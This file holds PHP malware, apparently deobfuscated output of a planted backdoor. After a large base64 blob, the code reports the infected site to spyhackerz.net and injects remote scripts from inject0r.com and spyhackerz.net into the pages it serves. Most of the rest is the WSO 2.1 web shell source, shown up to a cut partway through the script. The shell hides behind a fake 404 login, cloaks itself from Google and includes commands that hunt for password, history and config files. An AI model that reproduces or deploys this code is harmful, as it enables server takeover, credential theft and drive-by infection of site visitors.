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";
eval /* PHPDeobfuscator eval output */ {
$zx = $_SERVER['HTTP_HOST'];
$wx = $_SERVER['SCRIPT_NAME'];
$site = "{$zx}" . "{$wx}";
$check = file_get_contents("https://spyhackerz.net/save.php?url={$site}&id=7821718728974864923874");
if ($check == 1) {
} else {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, "https://spyhackerz.net/save.php?url={$site}&id=7821718728974864923874");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$check = curl_exec($curl);
if ($check == 1) {
} else {
echo "<iframe style='height: 0; width:0;' src='https://spyhackerz.net/save.php?url={$site}&id=7821718728974864923874'></iframe>";
}
}
$linr = "ZWNobyAiPFNDUklQVCBTUkM9aHR0cDovL2luam";
$winr = "VjdDByLmNvbS91cGRhdGUuanM+PC9TQ1JJUFQ+Ijs=";
$min = "base64_decode";
eval /* PHPDeobfuscator eval output */ {
echo "<SCRIPT SRC=http://inject0r.com/update.js></SCRIPT>";
};
echo "<SCRIPT SRC=https://spyhackerz.net/app.js></SCRIPT>";
echo "<SCRIPT SRC=http://spyhackerz.net/app.js></SCRIPT>";
echo "<SCRIPT SRC=https://inject0r.com/update.js></SCRIPT>";
/* WSO 2.1 (Web Shell by pgems.in) */
$auth_pass = "e48e13207341b6bffb7fb1622282247b";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', "/var/www/html/refo11.txt.3cae296882fd71dd958827beaa866147.bin");
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if (get_magic_quotes_gpc()) {
function stripslashes_array($array)
{
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin()
{
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?php
echo $_SERVER['HTTP_HOST'];
?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
if (empty($auth_pass) || isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
if (strtolower("PHP") == "win") {
$os = 'win';
} else {
$os = 'nix';
}
$safe_mode = @ini_get('safe_mode');
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) {
@chdir($_POST['c']);
}
$cwd = @getcwd();
if ($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if ($cwd[strlen($cwd) - 1] != '/') {
$cwd .= '/';
}
if ($os == 'win') {
$aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
} else {
$aliases = array("List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv");
}
function printHeader()
{
if (empty($_POST['charset'])) {
$_POST['charset'] = "UTF-8";
}
global $color;
?>
<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?php
echo $_POST['charset'];
?>'><title><?php
echo $_SERVER['HTTP_HOST'];
?>- 404 Not Found Shell V.<?php
echo "2.1";
?></title>
<style>
body {background-color:#000;color:#fff;}
body,td,th { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a { color:<?php
echo $color;
?> !important; }
span { font-weight: bolder; }
h1 { border:1px solid <?php
echo $color;
?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
div.content { padding: 5px;margin-left:5px;}
a { text-decoration:none; }
a:hover { background:#ff0000; }
.ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea { width:100%;height:250px; }
input, textarea, select { margin:0;color:#00ff00;background-color:#000;border:1px solid <?php
echo $color;
?>; font: 9pt Monospace,"Courier New"; }
form { margin:0px; }
#toolsTbl { text-align:center; }
.toolsInp { width: 80%; }
.main th {text-align:left;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
pre {font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
function set(a,c,p1,p2,p3,charset) {
if(a != null)document.mf.a.value=a;
if(c != null)document.mf.c.value=c;
if(p1 != null)document.mf.p1.value=p1;
if(p2 != null)document.mf.p2.value=p2;
if(p3 != null)document.mf.p3.value=p3;
if(charset != null)document.mf.charset.value=charset;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
document.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = "ajax=true";
for(i=0;i<document.mf.elements.length;i++)
params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
sr('<?php
echo $_SERVER['REQUEST_URI'];
?>', params);
}
function sr(url, params) {
if (window.XMLHttpRequest) {
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
else if (window.ActiveXObject) {
req = new ActiveXObject("Microsoft.XMLHTTP");
if (req) {
req.onreadystatechange = processReqChange;
req.open("POST", url, true);
req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
}
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
//alert(req.responseText);
var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
}
else alert("Request error!");
}
</script>
<head><body><div style="position:absolute;width:100%;top:0;left:0;">
<form method=post name=mf style='display:none;'>
<input type=hidden name=a value='<?php
echo isset($_POST['a']) ? $_POST['a'] : '';
?>'>
<input type=hidden name=c value='<?php
echo htmlspecialchars($GLOBALS['cwd']);
?>'>
<input type=hidden name=p1 value='<?php
echo isset($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '';
?>'>
<input type=hidden name=p2 value='<?php
echo isset($_POST['p2']) ? htmlspecialchars($_POST['p2']) : '';
?>'>
<input type=hidden name=p3 value='<?php
echo isset($_POST['p3']) ? htmlspecialchars($_POST['p3']) : '';
?>'>
<input type=hidden name=charset value='<?php
echo isset($_POST['charset']) ? $_POST['charset'] : '';
?>'>
</form>
<?php
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace ? $totalSpace : 1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$millink = 'http://milw0rm.com/search.php?dong=';
if (strpos('Linux', $kernel) !== false) {
$millink .= urlencode('Linux Kernel ' . substr($release, 0, 6));
} else {
$millink .= urlencode($kernel . ' ' . substr($release, 0, 3));
}
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n = count($path);
for ($i = 0; $i < $n - 1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for ($j = 0; $j <= $i; $j++) {
$cwd_links .= $path[$j] . '/';
}
$cwd_links .= "\")'>" . $path[$i] . "/</a>";
}
$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach ($charsets as $item) {
$opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>';
}
$m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'Safe mode' => 'SafeMode', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network');
if (!empty($GLOBALS['auth_pass'])) {
$m['Logout'] = 'Logout';
}
$m['Self remove'] = 'SelfRemove';
